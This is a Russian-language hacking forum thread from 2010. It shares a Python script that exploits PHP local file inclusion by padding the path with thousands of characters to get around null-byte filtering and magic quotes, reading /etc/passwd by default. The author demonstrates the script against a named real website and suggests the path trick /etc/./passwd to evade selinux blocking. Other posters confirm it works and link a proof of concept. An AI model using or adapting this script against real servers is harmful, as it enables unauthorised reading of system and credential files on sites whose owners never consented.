Обход фильтрации нуль байта

Discussion in 'Песочница' started by overxor, 7 Sep 2010.

  1. overxor

    overxor Member

    Joined:
    11 Sep 2009
    Messages:
    32
    Likes Received:
    9
    Reputations:
    0
    Данный метод работает во всех версиях php кроме последней 5.3.3
    Смысл в том, чтобы забивать путь в начале файла произвольными символами.

    Code:
    #!/usr/bin/env python
    # Null byte filter bypass
    import urllib, sys
    
    
    if len(sys.argv) < 2:
    	print "Use: fazzer <url> [file] [true]: "
    	exit()
    
    file = "../../../../../../../etc/passwd";
    true = "root"
    
    if len(sys.argv) > 3:
    	file = sys.argv[2]
    	true = sys.argv[3]
    
    url = sys.argv[1]
    
    for i in xrange(900, 4096):
    	sys.stderr.write("\rTry: " + str(i))
    
    	d = "t" * i
    	try:
    		fd = urllib.urlopen(url + d + file)
    	except:
    		print "Error connect"
    		sys.exit(1)
    
    	data = fd.read()
    	fd.close()
    
    	if data.find(true) > -1:
    		print '\n', data
    		exit(0)	
    
     
  2. overxor

    overxor Member

    Joined:
    11 Sep 2009
    Messages:
    32
    Likes Received:
    9
    Reputations:
    0
    На это и нацелен скрипт. чтобы обходить magic quotes.
    Иначе смысл было бы создавать тред.
     
  3. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    чё за бред, ни фига не пашет (5.2.6)
     
  4. overxor

    overxor Member

    Joined:
    11 Sep 2009
    Messages:
    32
    Likes Received:
    9
    Reputations:
    0
    Не согласен, вполне нормально работает.

    К примеру:
    python fazzer.py "http://www.bela.bg/?page_id=9&article_id=1000220&coments=yes&page="

    Try: 4041

    Возможно у тебя selinux блочит запросы напрямую в урле, если видит /etc/passwd. Пробуй /etc/./passwd

    Если не получится скинь в приват, я посмотрю.
     
    1 person likes this.
  5. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    все работает, ~POC:
    http://devteev.blogspot.com/2010/08/null-byte.html

    за реализацию спасибки :)